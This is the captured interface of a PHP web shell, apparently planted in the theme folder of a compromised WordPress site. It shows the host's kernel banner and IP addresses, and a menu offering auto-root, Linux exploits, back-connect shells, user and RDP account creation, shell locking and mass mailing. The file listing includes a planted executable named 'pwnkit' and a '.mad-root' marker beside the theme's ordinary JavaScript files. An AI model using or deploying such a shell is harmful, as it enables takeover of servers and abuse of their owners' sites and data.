Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
catch-box /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
catchbox-fitvids.js
2.71
KB
-rw-r--r--
catchbox-fitvids.min.js
1.58
KB
-rw-r--r--
catchbox-scrollup.js
393
B
-rw-r--r--
catchbox-scrollup.min.js
314
B
-rw-r--r--
catchbox_slider.js
1.2
KB
-rw-r--r--
html5.js
10.09
KB
-rw-r--r--
html5.min.js
2.58
KB
-rw-r--r--
jquery.cookie.js
3.02
KB
-rw-r--r--
jquery.cookie.min.js
1.26
KB
-rw-r--r--
jquery.cycle.all.js
50.81
KB
-rw-r--r--
jquery.cycle.all.min.js
26.54
KB
-rw-r--r--
jquery.sidr.js
16.64
KB
-rw-r--r--
jquery.sidr.min.js
7.11
KB
-rw-r--r--
navigation.js
1.45
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
skip-link-focus-fix.js
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catchbox_slider.js
/*! * jQuery Cycle set up * Version: 1.0 * Description: Featured slider to display in header.php */ jQuery(window).load(function() { if (typeof js_value !== "undefined") { var transition_effect = js_value.transition_effect; var transition_delay = js_value.transition_delay; var transition_duration = js_value.transition_duration; jQuery('#slider-wrap').cycle({ fx: transition_effect, // name of transition effect (or comma separated names, ex: 'fade,scrollUp,shuffle') next: '#nav-slider .nav-next', // advances slideshow to next slide prev: '#nav-slider .nav-previous', // advances slideshow to previous slide timeout: transition_delay, // milliseconds between slide transitions (0 to disable auto advance) speed: transition_duration, // speed of the transition (any valid fx speed value) pause: 1, // true to enable "pause on hover" pauseOnPagerHover: 1, // true to pause when hovering over pager link width: '100%', containerResize: 0, // resize container to fit largest slide fit: 1, after: function (){ jQuery(this).parent().css("height", jQuery(this).height()); } }); } });
Close